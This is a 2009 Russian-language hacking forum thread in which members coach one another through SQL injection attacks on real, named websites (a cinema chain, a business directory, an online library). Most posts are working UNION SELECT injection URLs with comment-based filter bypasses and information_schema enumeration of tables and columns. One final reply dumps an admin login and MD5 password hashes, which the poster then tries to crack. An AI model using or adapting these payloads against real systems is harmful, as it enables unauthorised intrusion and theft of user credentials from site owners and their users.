14.03.2009, 03:12
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
У меня в городе есть хороший кинотеат - кронверксинема и я давно на их сайте нашел скулю) Но все никак не могу раскрутить до конца...
Решил тут вот запостить.
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,4,5,6,7/* - это то до чего я добрался. Ошибка осталась, но при другом кол-ве полей еще одна ошибка вылезает => запрос правильный. Но выводимых полей нету... Чего я только не пробывал)
|
|
|
14.03.2009, 04:24
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
Сообщение от Tigger
У меня в городе есть хороший кинотеат - кронверксинема и я давно на их сайте нашел скулю) Но все никак не могу раскрутить до конца...
Решил тут вот запостить.
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,4,5,6,7/* - это то до чего я добрался. Ошибка осталась, но при другом кол-ве полей еще одна ошибка вылезает => запрос правильный. Но выводимых полей нету... Чего я только не пробывал)
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,version(),5,6,7/*
смотрим свойста имега(путь к картинке)
версия 5.0.21
Последний раз редактировалось S00pY; 14.03.2009 в 04:26..
|
|
|
|
14.03.2009, 03:13
|
|
Новичок
Регистрация: 13.03.2009
Сообщений: 2
С нами:
9033306
Репутация:
0
|
|
http://www.rfbd.ru/
В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273
вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1®ion=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.
Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1& region=72&rubrika=10
И появляется ошибка. Что не так сделал?
|
|
|
|
14.03.2009, 03:23
|
|
Познающий
Регистрация: 16.02.2009
Сообщений: 45
С нами:
9069151
Репутация:
66
|
|
Сообщение от EmIL
http://www.rfbd.ru/
В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273
вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1®ion=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.
Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1& region=72&rubrika=10
И появляется ошибка. Что не так сделал?
Таблица находиться в другой БД
|
|
|
|
14.03.2009, 03:27
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от EmIL
http://www.rfbd.ru/
В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273
вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1®ion=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.
Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1& region=72&rubrika=10
И появляется ошибка. Что не так сделал?
Проверил... Там только две ДБ: a1rfbd_ric_datebase и test... Ни в одной jos_users не подходит. А вообще разве это Joomla? Да и папка /administration/ нету. Ищи другие таблицы...
|
|
|
|
14.03.2009, 04:00
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
У меня такой же вопрос как и у Tigger, если какой то способ кроме /**/ заменить пробелы, а то при чпу выходит фигня -
http://lib.aldebaran.ru/author/dolgova_elena/dolgova_elena_centurion'/
? И почему вот такой финт не проходит
http://lib.aldebaran.ru/author/dolgova_elena/dolgova_elena_centurion'%2f**%2forder%2f**%2fby%2f **%2f1/
@EmIL
test.jos_users=>id
test.jos_users=>name
test.jos_users=>username
test.jos_users=>email
test.jos_users=>password
test.jos_users=>usertype
test.jos_users=>block
test.jos_users=>sendEmail
test.jos_users=>gid
test.jos_users=>registerDate
test.jos_users=>lastvisitDate
test.jos_users=>activation
test.jos_users=>params
Иногда БД test просто фейк
Последний раз редактировалось PaCo; 14.03.2009 в 04:36..
|
|
|
|
14.03.2009, 03:59
|
|
Новичок
Регистрация: 13.03.2009
Сообщений: 2
С нами:
9033306
Репутация:
0
|
|
Я тож проверял...Просто я новичек. Изучаю в данный момент пхп+мускул...Но все таки не понимаю уязвимости! Просто я тож находил эти базы, с помощбю параметра database(), но так и не понял, из какой базы из них и каким образом извлечь нужные мне логин и пароль юзеров...Да, я находил другие таблицы, да, я некоторые проверял, но ни в одной из них не было таблиц username, email, password. А возможно, что админ просто изпользовал самодельные, известные только ему, названия таблиц? То есть когда я использовал table_name, было около 50 таблиц! Админ мог использовать какое-нибуть "левое" название для нужной мне таблицы, а найденную мной сделать "фейком"??
Последний раз редактировалось EmIL; 14.03.2009 в 04:02..
|
|
|
|
14.03.2009, 04:20
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от EmIL
Я тож проверял...Просто я новичек. Изучаю в данный момент пхп+мускул...Но все таки не понимаю уязвимости! Просто я тож находил эти базы, с помощбю параметра database(), но так и не понял, из какой базы из них и каким образом извлечь нужные мне логин и пароль юзеров...Да, я находил другие таблицы, да, я некоторые проверял, но ни в одной из них не было таблиц username, email, password. А возможно, что админ просто изпользовал самодельные, известные только ему, названия таблиц?
1) ДБ узнается через table_schema
2) Можно искать таблицы по именам полей, т.е. ПРИМЕР: 1,2,table_name,4,5+from+information_schema.tables+ where+column_name+like+'%user%'.
|
|
|
|
14.03.2009, 04:14
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,us ername,password,email),10,11,12,13,14,15,16,17,18, 19,20+from+test.jos_users
|
|
|
|
14.03.2009, 04:35
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
2 Tigger
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/UNION/**/SELECT/**/1,2,3,(SELECT/**/CONCAT_WS(0x3a,u_login,u_password)/**/FROM/**/kronverk.0users/**/LIMIT/**/1,1),5,6,7/*
[0]:0admin:cb9bfe903a233a5e3e5db91f557efa49
[1]:user1:ae1276475fe133abcc93dff6bebc9413
Пароль не найден в паблик базе,
на passcracking.ru не найден
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
